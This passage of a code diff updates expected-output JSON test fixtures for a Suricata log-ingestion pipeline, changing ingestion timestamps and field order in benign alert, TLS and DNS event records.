@@ -795,7 +795,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:45:19.996669800Z", + "ingested": "2021-12-14T14:55:13.788110648Z", "original": "{\"timestamp\":\"2018-10-04T09:34:59.168340+0000\",\"flow_id\":112424506237238,\"in_iface\":\"enp0s3\",\"event_type\":\"alert\",\"src_ip\":\"192.168.1.146\",\"src_port\":52340,\"dest_ip\":\"91.189.91.23\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2013504,\"rev\":5,\"signature\":\"ET POLICY GNU\\/Linux APT User-Agent Outbound likely related to package management\",\"category\":\"Not Suspicious Traffic\",\"severity\":3},\"http\":{\"hostname\":\"archive.ubuntu.com\",\"url\":\"\\/ubuntu\\/dists\\/bionic\\/InRelease\",\"http_user_agent\":\"Debian APT-HTTP\\/1.3 (1.6.3ubuntu0.1)\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":304,\"length\":0},\"app_proto\":\"http\",\"flow\":{\"pkts_toserver\":4,\"pkts_toclient\":3,\"bytes_toserver\":487,\"bytes_toclient\":417,\"start\":\"2018-10-04T09:34:58.926006+0000\"}}", "created": "2020-04-28T11:07:58.223Z", "kind": "alert", 
@@ -899,7 +899,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:45:19.996675700Z", + "ingested": "2021-12-14T14:55:13.788110995Z", "original": "{\"timestamp\":\"2018-10-04T09:34:59.288862+0000\",\"flow_id\":112424506237238,\"in_iface\":\"enp0s3\",\"event_type\":\"alert\",\"src_ip\":\"192.168.1.146\",\"src_port\":52340,\"dest_ip\":\"91.189.91.23\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":1,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2013504,\"rev\":5,\"signature\":\"ET POLICY GNU\\/Linux APT User-Agent Outbound likely related to package management\",\"category\":\"Not Suspicious Traffic\",\"severity\":3},\"http\":{\"hostname\":\"archive.ubuntu.com\",\"url\":\"\\/ubuntu\\/dists\\/bionic-updates\\/InRelease\",\"http_user_agent\":\"Debian APT-HTTP\\/1.3 (1.6.3ubuntu0.1)\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":200,\"length\":2601},\"app_proto\":\"http\",\"flow\":{\"pkts_toserver\":6,\"pkts_toclient\":5,\"bytes_toserver\":842,\"bytes_toclient\":3445,\"start\":\"2018-10-04T09:34:58.926006+0000\"}}", "created": "2020-04-28T11:07:58.223Z", "kind": "alert", 
@@ -1003,7 +1003,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:45:19.996681500Z", + "ingested": "2021-12-14T14:55:13.788111385Z", "original": "{\"timestamp\":\"2018-10-04T09:34:59.289324+0000\",\"flow_id\":764842923400056,\"in_iface\":\"enp0s3\",\"event_type\":\"alert\",\"src_ip\":\"192.168.1.146\",\"src_port\":37742,\"dest_ip\":\"91.189.88.152\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":1,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2013504,\"rev\":5,\"signature\":\"ET POLICY GNU\\/Linux APT User-Agent Outbound likely related to package management\",\"category\":\"Not Suspicious Traffic\",\"severity\":3},\"http\":{\"hostname\":\"security.ubuntu.com\",\"url\":\"\\/ubuntu\\/dists\\/bionic-security\\/main\\/source\\/by-hash\\/SHA256\\/f5ec03d97ca76c98162d9233c8b7c578c52897e2136428277baf2e7b633a8e72\",\"http_user_agent\":\"Debian APT-HTTP\\/1.3 (1.6.3ubuntu0.1)\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":200,\"length\":1241},\"app_proto\":\"http\",\"flow\":{\"pkts_toserver\":64,\"pkts_toclient\":62,\"bytes_toserver\":4810,\"bytes_toclient\":90543,\"start\":\"2018-10-04T09:34:58.924536+0000\"}}", "created": "2020-04-28T11:07:58.223Z", "kind": "alert", 
@@ -1107,7 +1107,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:45:19.996687400Z", + "ingested": "2021-12-14T14:55:13.788111728Z", "original": "{\"timestamp\":\"2018-10-04T09:34:59.356132+0000\",\"flow_id\":764842923400056,\"in_iface\":\"enp0s3\",\"event_type\":\"alert\",\"src_ip\":\"192.168.1.146\",\"src_port\":37742,\"dest_ip\":\"91.189.88.152\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":2,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2013504,\"rev\":5,\"signature\":\"ET POLICY GNU\\/Linux APT User-Agent Outbound likely related to package management\",\"category\":\"Not Suspicious Traffic\",\"severity\":3},\"http\":{\"hostname\":\"security.ubuntu.com\",\"url\":\"\\/ubuntu\\/dists\\/bionic-security\\/main\\/binary-amd64\\/by-hash\\/SHA256\\/c5b8346a3221bc9a23a79ba4dc4e730a6319a77fc9d63872dfc56539a0810015\",\"http_user_agent\":\"Debian APT-HTTP\\/1.3 (1.6.3ubuntu0.1)\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":200,\"length\":2687},\"app_proto\":\"http\",\"flow\":{\"pkts_toserver\":87,\"pkts_toclient\":98,\"bytes_toserver\":6591,\"bytes_toclient\":145014,\"start\":\"2018-10-04T09:34:58.924536+0000\"}}", "created": "2020-04-28T11:07:58.223Z", "kind": "alert", 
@@ -1211,7 +1211,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:45:19.996693700Z", + "ingested": "2021-12-14T14:55:13.788112289Z", "original": "{\"timestamp\":\"2018-10-04T09:34:59.456919+0000\",\"flow_id\":764842923400056,\"in_iface\":\"enp0s3\",\"event_type\":\"alert\",\"src_ip\":\"192.168.1.146\",\"src_port\":37742,\"dest_ip\":\"91.189.88.152\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":3,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2013504,\"rev\":5,\"signature\":\"ET POLICY GNU\\/Linux APT User-Agent Outbound likely related to package management\",\"category\":\"Not Suspicious Traffic\",\"severity\":3},\"http\":{\"hostname\":\"security.ubuntu.com\",\"url\":\"\\/ubuntu\\/dists\\/bionic-security\\/universe\\/binary-amd64\\/by-hash\\/SHA256\\/e5cc957139a25a0fee47cbf2c0fac8ad5cab50346d6a74abe031748924c5b558\",\"http_user_agent\":\"Debian APT-HTTP\\/1.3 (1.6.3ubuntu0.1)\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":200,\"length\":2688},\"app_proto\":\"http\",\"flow\":{\"pkts_toserver\":156,\"pkts_toclient\":221,\"bytes_toserver\":11460,\"bytes_toclient\":330525,\"start\":\"2018-10-04T09:34:58.924536+0000\"}}", "created": "2020-04-28T11:07:58.223Z", "kind": "alert", 
@@ -1315,7 +1315,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:45:19.996699600Z", + "ingested": "2021-12-14T14:55:13.788112640Z", "original": "{\"timestamp\":\"2018-10-04T09:34:59.747122+0000\",\"flow_id\":112424506237238,\"in_iface\":\"enp0s3\",\"event_type\":\"alert\",\"src_ip\":\"192.168.1.146\",\"src_port\":52340,\"dest_ip\":\"91.189.91.23\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":2,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2013504,\"rev\":5,\"signature\":\"ET POLICY GNU\\/Linux APT User-Agent Outbound likely related to package management\",\"category\":\"Not Suspicious Traffic\",\"severity\":3},\"http\":{\"hostname\":\"archive.ubuntu.com\",\"url\":\"\\/ubuntu\\/dists\\/bionic-backports\\/InRelease\",\"http_user_agent\":\"Debian APT-HTTP\\/1.3 (1.6.3ubuntu0.1)\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":200,\"length\":2601},\"app_proto\":\"http\",\"flow\":{\"pkts_toserver\":64,\"pkts_toclient\":67,\"bytes_toserver\":4895,\"bytes_toclient\":96554,\"start\":\"2018-10-04T09:34:58.926006+0000\"}}", "created": "2020-04-28T11:07:58.223Z", "kind": "alert", 
@@ -1419,7 +1419,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:45:19.996705700Z", + "ingested": "2021-12-14T14:55:13.788112992Z", "original": "{\"timestamp\":\"2018-10-04T09:34:59.953886+0000\",\"flow_id\":112424506237238,\"in_iface\":\"enp0s3\",\"event_type\":\"alert\",\"src_ip\":\"192.168.1.146\",\"src_port\":52340,\"dest_ip\":\"91.189.91.23\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":3,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2013504,\"rev\":5,\"signature\":\"ET POLICY GNU\\/Linux APT User-Agent Outbound likely related to package management\",\"category\":\"Not Suspicious Traffic\",\"severity\":3},\"http\":{\"hostname\":\"archive.ubuntu.com\",\"url\":\"\\/ubuntu\\/dists\\/bionic-updates\\/main\\/source\\/by-hash\\/SHA256\\/65f2e3a4e9d89d9d4b5e3d42e586bc96f48a24466b0ad0b4a707255e44a26b03\",\"http_user_agent\":\"Debian APT-HTTP\\/1.3 (1.6.3ubuntu0.1)\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":200,\"length\":2687},\"app_proto\":\"http\",\"flow\":{\"pkts_toserver\":91,\"pkts_toclient\":119,\"bytes_toserver\":6932,\"bytes_toclient\":174843,\"start\":\"2018-10-04T09:34:58.926006+0000\"}}", "created": "2020-04-28T11:07:58.223Z", "kind": "alert", 
@@ -1523,7 +1523,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:45:19.996711700Z", + "ingested": "2021-12-14T14:55:13.788113354Z", "original": "{\"timestamp\":\"2018-10-04T09:35:00.250560+0000\",\"flow_id\":112424506237238,\"in_iface\":\"enp0s3\",\"event_type\":\"alert\",\"src_ip\":\"192.168.1.146\",\"src_port\":52340,\"dest_ip\":\"91.189.91.23\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":4,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2013504,\"rev\":5,\"signature\":\"ET POLICY GNU\\/Linux APT User-Agent Outbound likely related to package management\",\"category\":\"Not Suspicious Traffic\",\"severity\":3},\"http\":{\"hostname\":\"archive.ubuntu.com\",\"url\":\"\\/ubuntu\\/dists\\/bionic-updates\\/universe\\/source\\/by-hash\\/SHA256\\/56cfd9cc2efa61dff7428dddf921c3cd6047ab8e6484a7f1888e4c3f7252f1ef\",\"http_user_agent\":\"Debian APT-HTTP\\/1.3 (1.6.3ubuntu0.1)\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":200,\"length\":2688},\"app_proto\":\"http\",\"flow\":{\"pkts_toserver\":159,\"pkts_toclient\":253,\"bytes_toserver\":11679,\"bytes_toclient\":376452,\"start\":\"2018-10-04T09:34:58.926006+0000\"}}", "created": "2020-04-28T11:07:58.223Z", "kind": "alert", 
@@ -1627,7 +1627,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:45:19.996715200Z", + "ingested": "2021-12-14T14:55:13.788113707Z", "original": "{\"timestamp\":\"2018-10-04T09:35:00.401788+0000\",\"flow_id\":112424506237238,\"in_iface\":\"enp0s3\",\"event_type\":\"alert\",\"src_ip\":\"192.168.1.146\",\"src_port\":52340,\"dest_ip\":\"91.189.91.23\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":5,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2013504,\"rev\":5,\"signature\":\"ET POLICY GNU\\/Linux APT User-Agent Outbound likely related to package management\",\"category\":\"Not Suspicious Traffic\",\"severity\":3},\"http\":{\"hostname\":\"archive.ubuntu.com\",\"url\":\"\\/ubuntu\\/dists\\/bionic-updates\\/main\\/binary-amd64\\/by-hash\\/SHA256\\/4360137dc8f98b47648da1fef5472ef234fb02115bc2b29873bcaeee62637e70\",\"http_user_agent\":\"Debian APT-HTTP\\/1.3 (1.6.3ubuntu0.1)\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":200,\"length\":2687},\"app_proto\":\"http\",\"flow\":{\"pkts_toserver\":190,\"pkts_toclient\":314,\"bytes_toserver\":13986,\"bytes_toclient\":468170,\"start\":\"2018-10-04T09:34:58.926006+0000\"}}", "created": "2020-04-28T11:07:58.223Z", "kind": "alert", 
@@ -1731,7 +1731,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:45:19.996720200Z", + "ingested": "2021-12-14T14:55:13.788114137Z", "original": "{\"timestamp\":\"2018-10-04T09:35:00.776438+0000\",\"flow_id\":112424506237238,\"in_iface\":\"enp0s3\",\"event_type\":\"alert\",\"src_ip\":\"192.168.1.146\",\"src_port\":52340,\"dest_ip\":\"91.189.91.23\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":6,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2013504,\"rev\":5,\"signature\":\"ET POLICY GNU\\/Linux APT User-Agent Outbound likely related to package management\",\"category\":\"Not Suspicious Traffic\",\"severity\":3},\"http\":{\"hostname\":\"archive.ubuntu.com\",\"url\":\"\\/ubuntu\\/dists\\/bionic-updates\\/restricted\\/binary-amd64\\/by-hash\\/SHA256\\/c93fdc7f10cad1263349fd7b5bdd6a7f7163165b96ad263b3e12022e319d0d12\",\"http_user_agent\":\"Debian APT-HTTP\\/1.3 (1.6.3ubuntu0.1)\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":200,\"length\":2691},\"app_proto\":\"http\",\"flow\":{\"pkts_toserver\":328,\"pkts_toclient\":588,\"bytes_toserver\":23361,\"bytes_toclient\":880323,\"start\":\"2018-10-04T09:34:58.926006+0000\"}}", "created": "2020-04-28T11:07:58.223Z", "kind": "alert", 
@@ -1835,7 +1835,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:45:19.996725700Z", + "ingested": "2021-12-14T14:55:13.788114508Z", "original": "{\"timestamp\":\"2018-10-04T09:35:00.897009+0000\",\"flow_id\":112424506237238,\"in_iface\":\"enp0s3\",\"event_type\":\"alert\",\"src_ip\":\"192.168.1.146\",\"src_port\":52340,\"dest_ip\":\"91.189.91.23\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":7,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2013504,\"rev\":5,\"signature\":\"ET POLICY GNU\\/Linux APT User-Agent Outbound likely related to package management\",\"category\":\"Not Suspicious Traffic\",\"severity\":3},\"http\":{\"hostname\":\"archive.ubuntu.com\",\"url\":\"\\/ubuntu\\/dists\\/bionic-updates\\/universe\\/binary-amd64\\/by-hash\\/SHA256\\/5190f7afbee38b3cb32225db478fdbabd46f76eaa9c5921a13091891bf3e9bbc\",\"http_user_agent\":\"Debian APT-HTTP\\/1.3 (1.6.3ubuntu0.1)\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":200,\"length\":2687},\"app_proto\":\"http\",\"flow\":{\"pkts_toserver\":330,\"pkts_toclient\":591,\"bytes_toserver\":23758,\"bytes_toclient\":884342,\"start\":\"2018-10-04T09:34:58.926006+0000\"}}", "created": "2020-04-28T11:07:58.223Z", "kind": "alert", 
@@ -1938,7 +1938,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:45:19.996731200Z", + "ingested": "2021-12-14T14:55:13.788114871Z", "original": "{\"timestamp\":\"2018-10-04T09:35:01.362208+0000\",\"flow_id\":112424506237238,\"in_iface\":\"enp0s3\",\"event_type\":\"alert\",\"src_ip\":\"192.168.1.146\",\"src_port\":52340,\"dest_ip\":\"91.189.91.23\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":8,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2013504,\"rev\":5,\"signature\":\"ET POLICY GNU\\/Linux APT User-Agent Outbound likely related to package management\",\"category\":\"Not Suspicious Traffic\",\"severity\":3},\"http\":{\"hostname\":\"archive.ubuntu.com\",\"url\":\"\\/ubuntu\\/dists\\/bionic-updates\\/universe\\/i18n\\/by-hash\\/SHA256\\/9fe539b7036e51327cd85ca5e0a4dd4eb47f69168875de2ac9842a5e36ebd4a4\",\"http_user_agent\":\"Debian APT-HTTP\\/1.3 (1.6.3ubuntu0.1)\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"length\":0},\"app_proto\":\"http\",\"flow\":{\"pkts_toserver\":524,\"pkts_toclient\":979,\"bytes_toserver\":36819,\"bytes_toclient\":1467603,\"start\":\"2018-10-04T09:34:58.926006+0000\"}}", "created": "2020-04-28T11:07:58.223Z", "kind": "alert", 
@@ -2041,7 +2041,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:45:19.996735400Z", + "ingested": "2021-12-14T14:55:13.788115221Z", "original": "{\"timestamp\":\"2018-10-04T09:35:01.575088+0000\",\"flow_id\":112424506237238,\"in_iface\":\"enp0s3\",\"event_type\":\"alert\",\"src_ip\":\"192.168.1.146\",\"src_port\":52340,\"dest_ip\":\"91.189.91.23\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":9,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2013504,\"rev\":5,\"signature\":\"ET POLICY GNU\\/Linux APT User-Agent Outbound likely related to package management\",\"category\":\"Not Suspicious Traffic\",\"severity\":3},\"http\":{\"hostname\":\"archive.ubuntu.com\",\"url\":\"\\/ubuntu\\/dists\\/bionic-updates\\/multiverse\\/binary-amd64\\/by-hash\\/SHA256\\/8ab8cb220c0e50521c589acc2bc2b43a3121210f0b035a0605972bcffd73dd16\",\"http_user_agent\":\"Debian APT-HTTP\\/1.3 (1.6.3ubuntu0.1)\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"length\":0},\"app_proto\":\"http\",\"flow\":{\"pkts_toserver\":575,\"pkts_toclient\":1079,\"bytes_toserver\":40452,\"bytes_toclient\":1618380,\"start\":\"2018-10-04T09:34:58.926006+0000\"}}", "created": "2020-04-28T11:07:58.223Z", "kind": "alert", @@ -2067,23 +2067,6 @@ } }, { - "destination": { - "port": 9080, - "address": "10.232.0.237", - "domain": "hostname.domain.net" - }, - "source": { - "port": 45884, - "address": "10.126.2.140", - "ip": "10.126.2.140" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "protocol": "tls", - "transport": "tcp" - }, "@timestamp": "2018-10-04T09:35:02.796Z", "ecs": { "version": "1.12.0" @@ -2096,6 +2079,11 @@ "10.126.2.140" ] }, + "destination": { + "port": 9080, + "address": "10.232.0.237", + "domain": "hostname.domain.net" + }, "suricata": { "eve": { "in_iface": "enp5s0", 
@@ -2156,8 +2144,13 @@ "version": "1.2", "version_protocol": "tls" }, + "source": { + "port": 45884, + "address": "10.126.2.140", + "ip": "10.126.2.140" + }, "event": { - "ingested": "2021-12-09T13:45:19.996740100Z", + "ingested": "2021-12-14T14:55:13.788115574Z", "original": "{\"tls\":{\"ja3s\":{\"string\":\"333,55555,66666-22\",\"hash\":\"0993626a07ad09e1ce91293be7aa5721\"},\"ja3\":{\"string\":\"001,22222-33333-00-44444-66666-333-333-55555-55555-22-55555-44444-22-33-66666-77777-22-88888-99999-333-22-66666-77777-22-99999-96611-22-33-88888-33333-88888-333-22222-33333-333-222-88888-444-99999-22222-666-777-888,22-33-44-55-6,77-88-99-0-11-11-22-33-44-55,0\",\"hash\":\"d92325c876e7279f4eb8c62415e3a6b7\"},\"notafter\":\"2024-07-16T14:52:35\",\"notbefore\":\"2019-07-17T14:52:35\",\"version\":\"TLS 1.2\",\"sni\":\"hostname.domain.net\",\"fingerprint\":\"00:11:22:33:44:55:66:77:88:99:aa:bb:cc:dd:ee:ff:00:11:22:33\",\"serial\":\"00:11:22:33:44:55:66:77:88\",\"issuerdn\":\"C=US, O=Google Inc, CN=Google Internet Authority G2\",\"subject\":\"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.google.com\"},\"proto\":\"TCP\",\"dest_port\":9080,\"dest_ip\":\"10.232.0.237\",\"src_port\":45884,\"src_ip\":\"10.126.2.140\",\"event_type\":\"tls\",\"in_iface\":\"enp5s0\",\"flow_id\":1091813059495729,\"timestamp\":\"2018-10-04T09:35:02.796615+0000\"}", "category": [ "network" @@ -2167,6 +2160,13 @@ ], "created": "2020-04-28T11:07:58.223Z", "kind": "event" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "protocol": "tls", + "transport": "tcp" } }, { 
@@ -2284,7 +2284,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:45:19.996745900Z", + "ingested": "2021-12-14T14:55:13.788116024Z", "original": "{\"flow\":{\"start\":\"2020-06-26T11:00:02.970011-0400\",\"bytes_toclient\":4660,\"bytes_toserver\":1074,\"pkts_toclient\":8,\"pkts_toserver\":7},\"app_proto\":\"tls\",\"tls\":{\"ja3s\":{\"string\":\"742,48172,30210-30\",\"hash\":\"391231ba5675e42807b9e1f457b2614e\"},\"ja3\":{\"string\":\"718,4682-2687-2686-41992-41911-53292-53297-41969-22905-41926-41924-94181-94711-15-23-95-12-11-205,0-33-50-53-6-61-39-23-34-85-81,93-04-52,3-9-3\",\"hash\":\"3f1ea03f5822e8021b60cc3e4b233181\"},\"notafter\":\"2026-06-25T17:36:29\",\"notbefore\":\"2016-06-27T17:36:29\",\"version\":\"TLS 1.2\",\"sni\":\"host.domain.net\",\"fingerprint\":\"36:3f:ee:2a:1c:fa:de:ad:be:ef:42:99:cf:a9:b0:91:01:eb:a9:cc\",\"serial\":\"72:A9:2C:51\",\"issuerdn\":\"C=Unknown, ST=Unknown, L=Unknown, O=Unknown, OU=Unknown, CN=Unknown\",\"subject\":\"C=Unknown, ST=Unknown, L=Unknown, O=Unknown, OU=Unknown, CN=Unknown\"},\"alert\":{\"severity\":3,\"category\":\"\",\"signature\":\"SURICATA TLS on unusual port\",\"rev\":1,\"signature_id\":2610003,\"gid\":1,\"action\":\"allowed\"},\"proto\":\"TCP\",\"dest_port\":8443,\"dest_ip\":\"10.128.2.48\",\"src_port\":64389,\"src_ip\":\"10.137.3.54\",\"event_type\":\"alert\",\"in_iface\":\"enp0s31f6\",\"flow_id\":991192778198299,\"timestamp\":\"2020-06-26T11:00:03.342282-0400\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "alert", diff --git a/packages/suricata/data_stream/eve/_dev/test/pipeline/test-eve-dns-4-1-4.log-expected.json b/packages/suricata/data_stream/eve/_dev/test/pipeline/test-eve-dns-4-1-4.log-expected.json index 549717e5874..f5411b26e33 100644 --- a/packages/suricata/data_stream/eve/_dev/test/pipeline/test-eve-dns-4-1-4.log-expected.json +++ b/packages/suricata/data_stream/eve/_dev/test/pipeline/test-eve-dns-4-1-4.log-expected.json 
@@ -1,6 +1,15 @@ { "expected": [ { + "@timestamp": "2019-08-22T23:48:27.924Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "10.0.2.15" + ] + }, "destination": { "port": 53, "address": "10.0.2.3" @@ -15,27 +24,6 @@ "type": "query", "id": "51803" }, - "source": { - "port": 46686, - "address": "10.0.2.15", - "ip": "10.0.2.15" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "protocol": "dns", - "transport": "udp" - }, - "@timestamp": "2019-08-22T23:48:27.924Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "10.0.2.15" - ] - }, "suricata": { "eve": { "in_iface": "enp0s3", @@ -50,8 +38,13 @@ "flow_id": "885455453886936" } }, + "source": { + "port": 46686, + "address": "10.0.2.15", + "ip": "10.0.2.15" + }, "event": { - "ingested": "2021-12-09T13:45:26.597818200Z", + "ingested": "2021-12-14T14:55:20.366673060Z", "original": "{\"timestamp\":\"2019-08-22T23:48:27.924120+0000\",\"flow_id\":885455453886936,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.15\",\"src_port\":46686,\"dest_ip\":\"10.0.2.3\",\"dest_port\":53,\"proto\":\"UDP\",\"dns\":{\"type\":\"query\",\"id\":51803,\"rrname\":\"google.com\",\"rrtype\":\"A\",\"tx_id\":0}}", "category": [ "network" @@ -61,9 +54,25 @@ ], "created": "2020-04-28T11:07:58.223Z", "kind": "event" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "protocol": "dns", + "transport": "udp" } }, { + "@timestamp": "2019-08-22T23:48:27.924Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "10.0.2.15" + ] + }, "destination": { "port": 53, "address": "10.0.2.3" 
@@ -78,27 +87,6 @@ "type": "query", "id": "39523" }, - "source": { - "port": 36993, - "address": "10.0.2.15", - "ip": "10.0.2.15" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "protocol": "dns", - "transport": "udp" - }, - "@timestamp": "2019-08-22T23:48:27.924Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "10.0.2.15" - ] - }, "suricata": { "eve": { "in_iface": "enp0s3", @@ -113,8 +101,13 @@ "flow_id": "1418448010418810" } }, + "source": { + "port": 36993, + "address": "10.0.2.15", + "ip": "10.0.2.15" + }, "event": { - "ingested": "2021-12-09T13:45:26.597827300Z", + "ingested": "2021-12-14T14:55:20.366674964Z", "original": "{\"timestamp\":\"2019-08-22T23:48:27.924282+0000\",\"flow_id\":1418448010418810,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.15\",\"src_port\":36993,\"dest_ip\":\"10.0.2.3\",\"dest_port\":53,\"proto\":\"UDP\",\"dns\":{\"type\":\"query\",\"id\":39523,\"rrname\":\"google.com\",\"rrtype\":\"AAAA\",\"tx_id\":0}}", "category": [ "network" @@ -124,9 +117,26 @@ ], "created": "2020-04-28T11:07:58.223Z", "kind": "event" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "protocol": "dns", + "transport": "udp" } }, { + "@timestamp": "2019-08-22T23:48:27.950Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", + "10.0.2.3" + ] + }, "destination": { "port": 36993, "address": "10.0.2.15" @@ -157,28 +167,6 @@ ], "type": "answer" }, - "source": { - "port": 53, - "address": "10.0.2.3", - "ip": "10.0.2.3" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "protocol": "dns", - "transport": "udp" - }, - "@timestamp": "2019-08-22T23:48:27.950Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", - "10.0.2.3" - ] - }, "suricata": { "eve": { "in_iface": "enp0s3", 
@@ -193,8 +181,13 @@ "flow_id": "1418448010418810" } }, + "source": { + "port": 53, + "address": "10.0.2.3", + "ip": "10.0.2.3" + }, "event": { - "ingested": "2021-12-09T13:45:26.597894Z", + "ingested": "2021-12-14T14:55:20.366675361Z", "original": "{\"timestamp\":\"2019-08-22T23:48:27.950946+0000\",\"flow_id\":1418448010418810,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.3\",\"src_port\":53,\"dest_ip\":\"10.0.2.15\",\"dest_port\":36993,\"proto\":\"UDP\",\"dns\":{\"version\":2,\"type\":\"answer\",\"id\":39523,\"flags\":\"8180\",\"qr\":true,\"rd\":true,\"ra\":true,\"rcode\":\"NOERROR\",\"rrname\":\"google.com\",\"rrtype\":\"AAAA\",\"answers\":[{\"rrname\":\"google.com\",\"rrtype\":\"AAAA\",\"ttl\":272,\"rdata\":\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\"}],\"grouped\":{\"AAAA\":[\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\"]}}}", "category": [ "network" @@ -204,9 +197,26 @@ ], "created": "2020-04-28T11:07:58.223Z", "kind": "event" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "protocol": "dns", + "transport": "udp" } }, { + "@timestamp": "2019-08-22T23:48:27.957Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "175.16.199.1", + "10.0.2.3" + ] + }, "destination": { "port": 46686, "address": "10.0.2.15" @@ -237,28 +247,6 @@ ], "type": "answer" }, - "source": { - "port": 53, - "address": "10.0.2.3", - "ip": "10.0.2.3" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "protocol": "dns", - "transport": "udp" - }, - "@timestamp": "2019-08-22T23:48:27.957Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "175.16.199.1", - "10.0.2.3" - ] - }, "suricata": { "eve": { "in_iface": "enp0s3", 
@@ -273,8 +261,13 @@ "flow_id": "885455453886936" } }, + "source": { + "port": 53, + "address": "10.0.2.3", + "ip": "10.0.2.3" + }, "event": { - "ingested": "2021-12-09T13:45:26.597898300Z", + "ingested": "2021-12-14T14:55:20.366675720Z", "original": "{\"timestamp\":\"2019-08-22T23:48:27.957906+0000\",\"flow_id\":885455453886936,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.3\",\"src_port\":53,\"dest_ip\":\"10.0.2.15\",\"dest_port\":46686,\"proto\":\"UDP\",\"dns\":{\"version\":2,\"type\":\"answer\",\"id\":51803,\"flags\":\"8180\",\"qr\":true,\"rd\":true,\"ra\":true,\"rcode\":\"NOERROR\",\"rrname\":\"google.com\",\"rrtype\":\"A\",\"answers\":[{\"rrname\":\"google.com\",\"rrtype\":\"A\",\"ttl\":299,\"rdata\":\"175.16.199.1\"}],\"grouped\":{\"A\":[\"175.16.199.1\"]}}}", "category": [ "network" @@ -284,9 +277,25 @@ ], "created": "2020-04-28T11:07:58.223Z", "kind": "event" + }, + 